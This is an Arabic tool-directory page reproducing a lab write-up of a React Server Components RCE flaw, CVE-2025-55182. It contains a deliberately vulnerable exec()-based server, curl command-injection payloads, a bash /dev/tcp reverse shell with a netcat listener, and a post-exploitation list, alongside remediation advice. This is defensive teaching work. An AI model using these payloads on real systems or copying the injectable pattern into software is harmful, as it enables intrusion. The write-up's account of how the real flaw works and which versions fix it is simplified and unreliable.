Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-55182-analysis — بحث أمني وتحليل استغلال لثغرة CVE-2025-55182 (React) — ربط CVSS مع OWASP Top 10 | Kitploit
أدوات/GitHubGitHub/mohamedniane/cve-2025-55182-analysis
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmohamedniane/cve-2025-55182-analysis

cve-2025-55182-analysis

بحث أمني وتحليل استغلال لثغرة CVE-2025-55182 (React) — ربط CVSS مع OWASP Top 10

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
منذ 4 أشهرلم تتم المراجعة بعد

CVE-2025-55182 — تحليل تنفيذ التعليمات البرمجية عن بُعد في React Server Components

تحليل ثغرة أمنية في تطبيق ويب · M2 Cybersecurity · 2025 المؤلف: نيان محمد · LinkedIn

سلسلة استغلال متكاملة لثغرة إلغاء تسلسل غير آمنة خطيرة (CVSS 10.0) في React Server Components، بدءًا من الاستطلاع وصولًا إلى تنفيذ تعليمات برمجية عن بُعد دون مصادقة، مع خارطة طريق كاملة للمعالجة.


⚠️ إخلاء مسؤولية أخلاقي

يستهدف هذا البحث تطبيقًا مخبريًا ضعيفًا عمدًا صُمم لتوضيح الثغرة CVE. تمت جميع الاختبارات في شبكة افتراضية معزولة دون أي اتصال بأنظمة الإنتاج أو بيانات مستخدمين حقيقية أو خدمات طرف ثالث.

  • لا تقم بتشغيل هذه التقنيات ضد أنظمة لا تملكها أو لا تملك إذنًا كتابيًا صريحًا لاختبارها.
  • لا تنشر التطبيق الضعيف إلى أي شبكة متصلة بالإنترنت.
  • تنطبق مبادئ الإفصاح المسؤول — أبلغ دائمًا عن النتائج عبر قنوات منسقة.

جدول المحتويات

  1. ملخص الثغرة
  2. الإصدارات المتأثرة
  3. بيئة المختبر
  4. شرح الاستغلال
  5. تقييم الأثر
  6. المعالجة
  7. المهارات المُثبتة

ملخص الثغرة

كيف تعمل الثغرة

قدّمت React Server Components تنسيق تسلسل جديدًا لبث المكوّنات المُقدَّمة من جانب الخادم إلى العميل. في الإصدارات الضعيفة، تقبل نقطة نهاية RSC حمولة JSON تحتوي على حقل cmd يُمرَّر دون تنقية إلى child_process.exec() كجزء من تقييم العرض من جانب الخادم.

يمكن للمهاجم إرسال طلب POST مُعدّ بدقة بحيث:

  1. يُقبل كحمولة RSC شرعية (بدون مصادقة، بدون CSRF)
  2. يُفعّل تنفيذ تعليمات برمجية من جانب الخادم أثناء "العرض"
  3. يعمل بصلاحيات عملية Node.js (غالبًا root في الحاويات)

الإصدارات المتأثرة

المكوّنالنطاق المتأثرتم التصحيح في
react19.0.0 → 19.2.019.3.0+

بيئة المختبر

التطبيق الهدف

خادم Express + RSC بسيط يعرّض نقطة نهاية /rsc تنفّذ الأوامر من الحمولة الواردة بشكل غير آمن — لإعادة إنتاج نمط الثغرة في CVE الحقيقية بطريقة مُتحكم بها:

root@kitploit:~
// server.js — simplified, lab-only
const express = require('express');
const { exec } = require('child_process');

const app = express();
app.use(express.json({ limit: '2mb' }));

app.post('/rsc', (req, res) => {
  const payload = req.body?.payload;
  if (typeof payload?.cmd === 'string') {
    // VULNERABLE: executes attacker-controlled string
    exec(payload.cmd, { timeout: 10000 }, (err, stdout, stderr) => {
      if (err) return res.status(500).json({ error: String(err), stderr });
      return res.json({ ok: true, out: stdout });
    });
  }
});

app.listen(3000);

شرح الاستغلال

المرحلة 1 — الاستطلاع

root@kitploit:~
# Port discovery
nmap 192.168.159.131
# → 3000/tcp open  ppp  (Node.js RSC server)

# Service verification
curl -v http://192.168.159.131:3000/
# → HTTP/1.1 200 OK
# → X-Powered-By: Express
# → "Vulnerable RSC-like test server. Use POST /rsc with JSON..."

تمثل ترويسة X-Powered-By: Express والمنفذ غير المعتاد 3000 بصمة قوية على أن هذا تطبيق Node.js — بما يتوافق مع بيئات نشر RSC.

المرحلة 2 — التأكيد عبر أمر غير ضار

قبل محاولة القيام بأي إجراء تدميري، تحقق من الثغرة باستخدام أمر غير مؤذٍ:

root@kitploit:~
curl -X POST http://192.168.159.131:3000/rsc \
  -H "Content-Type: application/json" \
  -d '{ "payload": { "cmd": "id" } }'

# Response:
# {"ok":true,"out":"uid=0(root) gid=0(root) groups=0(root)\n"}

✅ مؤكَّد: تنفيذ تعليمات برمجية عن بُعد دون مصادقة بصلاحيات root. يعمل الخادم بصلاحيات غير مقيّدة.

المرحلة 3 — القشرة العكسية

ارتقِ من تنفيذ أمر واحد إلى قشرة تفاعلية كاملة:

root@kitploit:~
# Listener on attacker machine
nc -lvnp 4444

# Payload delivery
curl -X POST http://192.168.159.131:3000/rsc \
  -H "Content-Type: application/json" \
  -d '{ "payload": { "cmd": "/bin/bash -c \"/bin/bash -i >& /dev/tcp/192.168.159.128/4444 0>&1\"" } }'

يتلقى المستمع:

root@kitploit:~
connect to [192.168.159.128] from (UNKNOWN) [192.168.159.131] 43980
root@ns1:~/vulnerable_rsc_app# id
uid=0(root) gid=0(root) groups=0(root)

المرحلة 4 — إمكانيات ما بعد الاستغلال (مُوضَّحة، غير منفَّذة)

بامتلاك صلاحيات root على الهدف، يستطيع المهاجم بسهولة:

  • قراءة /etc/shadow ومفاتيح SSH وأسرار التطبيق وملفات .env
  • تثبيت آليات استمرارية (مهام cron وخدمات systemd وزرع مفاتيح SSH)
  • التنقل الجانبي عبر بيانات الاعتماد المكتشفة
  • نشر برامج تعدين العملات الرقمية أو برامج الفدية
  • تعديل تطبيق Node.js لالتقاط بيانات المستخدمين بصمت

تقييم الأثر

الأثر على الأعمال (سيناريو هدف افتراضي)

ملف الجهات المهاجمة

انخفاض تعقيد هذا الهجوم — دون مصادقة أو تفاعل من المستخدم، وطلب HTTP واحد فقط — يجعله جذابًا لما يلي:

  • الماسحات الانتهازية (شبكات روبوتات تفحص تلقائيًا بحثًا عن هذه الثغرة)
  • وسطاء الوصول الأولي الذين يبيعون نقاط الدخول إلى جماعات برامج الفدية
  • جهات تابعة لدول تستهدف المؤسسات التي تستخدم العرض من جانب الخادم في React

المعالجة

إجراءات فورية (خلال 24 ساعة)

  1. ترقية React إلى 19.3.0+ — الإصدار المُصحَّح

    root@kitploit:~
    npm update react react-server-dom-webpack react-server-dom-esm
    
  2. قاعدة WAF مؤقتة (إذا تأخرت الترقية):

    root@kitploit:~
    Block POST requests to /rsc with JSON body containing "cmd" field
    
  3. استجابة طارئة للحوادث:

    • مراجعة سجلات وصول الخادم لآخر 90 يومًا
    • البحث عن حركة POST غير معتادة إلى /rsc
    • تدوير جميع الأسرار التي يمكن الوصول إليها من الخادم
    • التقاط لقطة للنظام المتأثر للتحليل الجنائي قبل المعالجة

إجراءات قصيرة المدى (خلال أسبوعين)

إجراءات طويلة المدى (خلال ربع سنة)

الربط مع OWASP Top 10

فئة OWASPالصلة
A03:2021 — الحقنحقن أوامر عبر إدخال مُلغى التسلسل

المهارات المُثبتة

  • تحليل الثغرات: فرز CVE، احتساب درجات CVSS، تقييم قابلية الاستغلال
  • الاستطلاع: فحص Nmap، بصمات الخدمات، التقاط اللافتات
  • الاستغلال: التلاعب بطلبات HTTP عبر curl، هندسة القشرة العكسية، صياغة الحمولات
  • أدوات البروكسي: الاعتراض عبر OWASP ZAP، تعديل الطلبات/الاستجابات
  • التواصل التجاري: ترجمة النتائج التقنية إلى لغة مخاطر تنفيذية
  • تصميم المعالجة: ضوابط متعددة الطبقات عبر آفاق فورية وقصيرة وطويلة المدى
  • الأطر: OWASP Top 10، CVSS v3.1، تصنيف CWE، تقييم الأثر وفق GDPR/DSGVO

المراجع

  • مدخل CVE-2025-55182 في NVD (نموذج مؤقت — تحقق قبل الاستشهاد)
  • توثيق React Server Components
  • OWASP Top 10 — 2021
  • مواصفة CVSS v3.1
  • CWE-502 — إلغاء تسلسل البيانات غير الموثوقة

الترخيص

رخصة MIT — راجع LICENSE

نُشر لأغراض تعليمية وبحوث دفاعية. راجع إخلاء المسؤولية الأخلاقي في الأعلى.


التواصل

نيان محمد — مهندس شبكات وأمن 📍 نواكشوط، موريتانيا → يبحث عن فرص في ألمانيا 🇩🇪 📧 [email protected] · 🔗 LinkedIn

تنزيل الأداة
الحقلالقيمة
CVECVE-2025-55182
التصنيفإلغاء تسلسل غير آمن → تنفيذ تعليمات برمجية عن بُعد
CVSS v3.110.0 (حرج) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
المصادقة المطلوبةلا شيء
تفاعل المستخدم المطلوبلا شيء
متجه الهجومالشبكة (عن بُعد)
المكوّنوقت تشغيل React Server Components (RSC)
react-server-dom-webpack19.0.0 → 19.2.019.3.0+
react-server-dom-esm19.0.0 → 19.2.019.3.0+
الدورنظام التشغيلالأدوات
المهاجمKali Linux (أحدث إصدار)nmap, curl, netcat, OWASP ZAP, Firefox
الهدفUbuntu 22.04.4Node.js 18, Express, React 19.0 RSC
الشبكةVMware VMnet Host-Onlyلا حركة خروج إلى الإنترنت
المحورالأثرالشرح
السريةحرجوصول كامل للقراءة إلى جميع بيانات الخادم
السلامةحرجالقدرة على تعديل كود التطبيق وبيانات المستخدمين
التوافرمرتفعيمكن للمهاجم إيقاف الخدمة أو احتجازها مقابل فدية
التنظيميشديدخرق لـ GDPR/DSGVO مع إلزامية الإفصاح خلال 72 ساعة · غرامة محتملة تصل إلى 4% من الإيرادات العالمية
السمعةشديدخرق معلن ومرتبط برقم CVE يضر بثقة العملاء
الماليمرتفعالاستجابة للحوادث، غرامات تنظيمية، دعوى جماعية محتملة
الإجراءالغرض
تعطيل RSC إذا لم يكن مستخدمًاتقليل سطح الهجوم — العديد من التطبيقات لا تحتاج إلى مكوّنات الخادم
تحقق صارم من المدخلاترفض أي كائن مُلغى التسلسل يحتوي على مفاتيح قابلة للتنفيذ
مستخدم حاوية بصلاحيات غير rootالحد من نطاق الضرر في حال تكرار RCE
نظام ملفات جذر للقراءة فقطمنع آليات الاستمرارية وإسقاط الملفات التنفيذية
تصفية حركة المرور الصادرةحظر حركة المرور الصادرة من خوادم التطبيقات إلى عناوين IP عشوائية
الإجراءالغرض
WAF مع تحليل سلوكيكشف حمولات POST الشاذة بما يتجاوز قواعد التوقيعات
الحماية الذاتية للتطبيق وقت التشغيل (RASP)حظر استدعاءات الدوال الخطيرة مثل exec() في وقت التشغيل
تحليل تركيبة البرمجيات (SCA) في CI/CDرصد التبعيات الضعيفة قبل النشر (pip-audit, npm audit, Trivy)
إيقاع اختبار الاختراقسنويًا + بعد كل إصدار رئيسي
برنامج مكافآت اكتشاف الثغراتتحفيز الإفصاح الأخلاقي قبل أن يكتشف المهاجمون الثغرات
A08:2021 — فشل سلامة البرمجيات والبياناتإلغاء تسلسل غير آمن دون التحقق من السلامة
A06:2021 — المكوّنات الضعيفة والقديمةاستخدام React 19.0-19.2 بعد الإفصاح عن الثغرة
A05:2021 — سوء الإعداد الأمنيتشغيل Node.js بصلاحيات root دون التحقق من المدخلات